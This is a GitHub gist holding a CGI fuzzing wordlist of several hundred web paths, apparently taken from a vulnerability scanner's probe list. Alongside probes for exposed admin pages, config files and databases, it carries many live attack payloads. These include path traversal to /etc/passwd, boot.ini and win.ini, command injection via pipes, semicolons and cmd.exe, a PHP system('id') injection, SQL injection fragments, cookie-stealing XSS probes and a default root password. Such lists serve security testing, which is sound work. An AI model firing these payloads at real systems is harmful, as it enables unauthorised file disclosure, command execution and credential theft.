Skip to content

Instantly share code, notes, and snippets.

@saurabh96216

saurabh96216/CGI fuzzing.txt

Created February 9, 2021 01:15
Show Gist options
  • Save saurabh96216/3c135780c9bc4f8bf6aa2d72fe9ab5a0 to your computer and use it in GitHub Desktop.
Save saurabh96216/3c135780c9bc4f8bf6aa2d72fe9ab5a0 to your computer and use it in GitHub Desktop.
Download ZIP
CGI wordlist
Raw
CGI fuzzing.txt
TiVoConnect?Command=QueryServer
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi
cgi-bin/flexform.cgi
cgi-bin/flexform
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/perlshop.cgi
cfappman/index.cfm
cfdocs/examples/cvbeans/beaninfo.cfm
cfdocs/examples/parks/detail.cfm
kboard/
lists/admin/
splashAdmin.php
ssdefs/
sshome/
tiki/
tiki/tiki-install.php
scripts/samples/details.idc
_vti_bin/shtml.exe
cgi-bin/handler.cgi
cgi-bin/finger
cgi-bin/finger.pl
cgi-bin/formmail.cgi
cgi-bin/formmail.pl
cgi-bin/formmail
cgi-bin/get32.exe
cgi-bin/gm-authors.cgi
cgi-bin/guestbook/passwd
cgi-bin/horde/test.php?mode=phpinfo
cgi-bin/photo/protected/manage.cgi
cgi-bin/wrap.cgi
./
~root/
cgi-bin/wrap
forums/@ADMINconfig.php
forums/config.php
ganglia/
guestbook/guestbookdat
guestbook/pwd
help/
hola/admin/cms/htmltags.php?datei=./sec/data.php
horde/imp/test.php
horde/test.php?mode=phpinfo
imp/horde/test.php?mode=phpinfo
imp/horde/test.php
index.html.bak
index.html~
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
global.inc
cgi-bin/horde/test.php
inc/common.load.php
inc/config.php
inc/dbase.php
cgi-bin/visadmin.exe
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/echo.bat?&dir+c:\
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/guestbook.cgi
cgi-bin/guestbook.pl
cgi-bin/ss
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
guestbook/guestbook.html
html/cgi-bin/cgicso?query=AAA
geeklog/users.php
gb/index.php?login=true
guestbook/admin.php
cgi-bin/gH.cgi
cgi-bin/gm-cplog.cgi
getaccess
help.html
cgi-bin/gm.cgi
filemanager/filemanager_forms.php
cgi-bin/AT-admin.cgi
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/blog/mt.cfg
cgi-bin/cart.pl?db='
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt/mt-check.cgi
cfdocs/expeval/openfile.cfm
index.php/123
mambo/index.php?Itemid=JUNK(5)
profile.php?u=JUNK(8)
ticket.php?id=99999
vgn/login/1,501,,00.html?cookieName=x--\>
a%5c.aspx
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
admin/browse.asp?FilePath=c:\&Opt=2&level=0
cgi-bin/architext_query.pl
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
tsweb/
cgi-bin/blog/mt-load.cgi
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/tools/ctss.idc
bigconf.cgi
billing/billing.apw
blah_badfile.shtml
blah-whatever-badfile.jsp
vgn/style
scripts/no-such-file.pl
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/moin.cgi?test
autologon.html?10514
basilix/mbox-list.php3
basilix/message-read.php3
clusterframe.jsp
IlohaMail/blank.html
bb-dnbd/faxsurvey
cartcart.cgi
scripts/Carello/Carello.dll
scripts/tools/dsnform.exe
scripts/tools/dsnform
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
prd.i/pgen/
readme.eml
scripts/httpodbc.dll
scripts/proxy/w3proxy.dll
scripts/root.exe?/c+dir+c:\+/OG
SiteServer/admin/
siteseed/
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
pccsmysqladm/incs/dbconnect.inc
iisadmin/
password.inc
PDG_Cart/oder.log
web-console/ServerInfo.jsp%00
global.asa
exchange/lib/AMPROPS.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/logon.inc
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
ows/restricted%2eshow
WEB-INF./web.xml
view_source.jsp
w-agora/
vider.php3
exchange/root.asp?acs=anon
officescan/cgi/cgiChkMasterPwd.exe
%NETHOOD%/
cgi-bin/astrocam.cgi
cgi-bin/badmin.cgi
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/mgrqcgi
cgi-bin/wconsole.dll
cgi-bin/webplus.exe?about
pbserver/pbserver.dll
administrator/gallery/uploadimage.php
pafiledb/includes/team/file.php
phpEventCalendar/file_upload.php
servlet/com.unify.servletexec.UploadServlet
cgi-win/uploader.exe
scripts/cpshost.dll
scripts/repost.asp
upload.asp
uploadn.asp
uploadx.asp
wa.exe
basilix/compose-attach.php3
server/
cgi-bin/fpsrvadm.exe
siteminder/smadmin.html
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/login
webtop/wdk/samples/index.jsp
cgi-bin/.cobalt
WEB-INF/web.xml
forum/admin/wwforum.mdb
fpdb/shop.mdb
guestbook/admin/o12guest.mdb
midicart.mdb
MIDICART/midicart.mdb
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
news/news.mdb
newuser?Image=../../database/rbsserv.mdb
shopdbtest.asp
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
SilverStream/Meta/Tables/?access-mode=text
database/db2000.mdb
cgi-bin/mailit.pl
cgi-bin/search
doc/webmin.config.notes
error/HTTP_NOT_FOUND.html.var
oem_webstage/cgi-bin/oemapp_cgi
ADMINconfig.php
cgi-bin/.access
cgi-bin/%2e%2e/abyss.conf
cgi-bin/data/fetch.php?page=
cgi-bin/empower?DB=whateverwhatever
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/store/agora.cgi?page=whatever33.html
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
article.php?article=4965&post=1111111111
blah123.php
categorie.php3?cid=june
CFIDE/probe.cfm
contents.php?new_language=elvish&mode=select
download.php?op=viewdownload
examples/basic/servlet/HelloServlet
home.php?arsc_language=elvish
hostadmin/?page='
index.php?file=index.php
jgb_eng_php3/cfooter.php3
JUNK(5).csp
modules.php?name=Downloads&d_op=viewdownload
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
path/nw/article.php?id='
pw/storemgr.pw
rtm.log
scozbook/view.php?PG=whatever
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
shopa_sessionlist.asp
simplebbs/users/users.php
sips/sipssys/users/a/admin/user
tcb/files/auth/r/root
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
vchat/msg.txt
vgn/license
web.config
webamil/test.php?mode=phpinfo
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webmail/horde/test.php
whateverJUNK(4).html
ws_ftp.ini
WS_FTP.ini
cgi-bin/MsmMask.exe
_mem_bin/auoconfig.asp
_mem_bin/remind.asp
exchange/lib/ATTACH.INC
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
trace.axd
tvcs/getservers.exe?action=selects1
whatever.htr
nsn/fdir.bas:ShowVolume
nsn/fdir.bas
servlet/webacc?User.html=noexist
forum/admin/database/wwForum.mdb
webmail/blank.html
jamdb/
cgi/cgiproc?
cgi-bin/addbanner.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/shtml.dll
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
cgi-bin/aglimpse.cgi
cgi-bin/aglimpse
cgi-bin/architext_query.cgi
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=AAA
servlet/SchedulerTransfer
servlet/sunexamples.BBoardServlet
servlets/SchedulerTransfer
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/hello.bat?&dir+c:\
cgi-bin/post32.exe|dir%20c:\
perl/-e%20print%20Hello
admin.cgi
interscan/
vgn/legacy/save
IDSWebApp/IDSjsp/Login.jsp
quikstore.cfg
quikstore.cgi
securecontrolpanel/
siteminder
webmail/
Xcelerate/LoginPage.html
_cti_pvt/
smg_Smxcfg30.exe?vcc=3560121183d3
examples/servlets/index.html
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
wikihome/action/conflict.php
cgi-bin/archie
cgi-bin/calendar.pl
cgi-bin/calendar
cgi-bin/date
cgi-bin/fortune
cgi-bin/redirect
cgi-bin/uptime
cgi-bin/wais.pl
/
webtop/wdk/
SilverStream
signon
upd/
examples/jsp/source.jsp??
lpt9
cfcache.map
cfdocs/cfcache.map
CVS/Entries
lpt9.xtp
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
asp/sqlqhit.asp
asp/SQLQHit.asp
iissamples/issamples/sqlqhit.asp
iissamples/issamples/SQLQHit.asp
ISSamples/sqlqhit.asp
ISSamples/SQLQHit.asp
junk.aspx
oc/Search/sqlqhit.asp
oc/Search/SQLQHit.asp
search/htx/sqlqhit.asp
search/htx/SQLQHit.asp
search/sqlqhit.asp
search/SQLQHit.asp
sqlqhit.asp
SQLQHit.asp
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
?Open
?OpenServer
catalog.nsf
cersvr.nsf
cgi-bin/testing_whatever
domlog.nsf
events4.nsf
log.nsf
names.nsf
LOGIN.PWD
USER/CONFIG.AP
cgi-bin/mail
cgi-bin/nph-error.pl
cgi-bin/post-query
cgi-bin/query
cgi-bin/test-cgi.tcl
cgi-bin/test-env
.perf
admin-serv/config/admpw
test.php%20
*.*
cgi-bin/cgi_process
ht_root/wwwroot/-/local/httpd$map.conf
JUNK(10)
local/httpd$map.conf
tree
cgi-bin/index.js0x70
%00/
%2e/
%2f/
%5c/
index.jsp%00x
weblogic
%a%s%p%d
index.html%20
852566C90012664F
hidden.nsf
mail.box
open?
setup.nsf
statrep.nsf
webadmin.nsf
cgi-bin/cgitest.exe
examples/servlet/AUX
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cfdocs/cfmlsyntaxcheck.cfm
Config1.htm
contents/extensions/asp/1
WebAdmin.dll?View=Logon
cgi-bin/Pbcgi.exe
cgi-bin/testcgi.exe
cgi-win/cgitest.exe
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
c/winnt/system32/cmd.exe?/c+dir+/OG
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/samples/adctest.asp
nikto.ida
SUNWmc/htdocs/
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-shl/win-c-sample.exe
examples/servlet/TroubleShooter
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
goform/CheckLogin?login=root&password=tslinux
[SecCheck]/..%2f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%252f..%252f../ext.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
.nsf/../winnt/win.ini
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
................../config.sys
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
php/php.exe?c:\winnt\boot.ini
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
wx/s.dll?d=/boot.ini
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
php/php.exe?c:\boot.ini
../../../../../../../../../boot.ini
../../../../winnt/repair/sam._
..\\..\\..\\..\\..\\..\\..\\boot.ini
//etc/passwd
//etc/hosts
///./../.../boot.ini
.cobalt/sysManage/../admin/.htaccess
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
DomainFiles/*//../../../../../../../../../../etc/passwd
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
index.php?download=/winnt/win.ini
index.php?download=/windows/win.ini
index.php?download=/etc/passwd
index.php?|=../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../boot.ini
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
phprocketaddin/?page=../../../../../../../../../../boot.ini
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phptonuke.php?filnavn=/etc/passwd
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
viewpage.php?file=/etc/passwd
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/opendir.php?/etc/passwd
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewsource?/etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
page.cgi?../../../../../../../../../../etc/passwd
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
athenareg.php?pass=%20;cat%20/etc/passwd
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\temp\temp.class
../../../../../../../../../../etc/passwd
.../.../.../.../.../.../.../.../.../boot.ini
................../etc/passwd
%3f.jsp
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%00
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
admentor/adminadmin.asp
POSTNUKEMy_eGallery/public/displayCategory.php
cgi-bin/classifieds/index.cgi
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
userinfo.php?uid=1;
site/'
postnuke/index.php?module=My_eGallery
postnuke/html/index.php?module=My_eGallery
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpBB2/search.php?search_id=1\
index.php?module=My_eGallery
author.asp
horde/test.php
examples/cookie
examples/session
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
index.php?option=search&searchword=<script>alert(document.cookie);</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
index.php?dir=<script>alert('Vulnerable')</script>
https-admserv/bin/index?/<script>alert(document.cookie)</script>
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
article.cfm?id=1'<script>alert(document.cookie);</script>
upload.php?type=\"<script>alert(document.cookie)</script>
soinfo.php?\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.stm
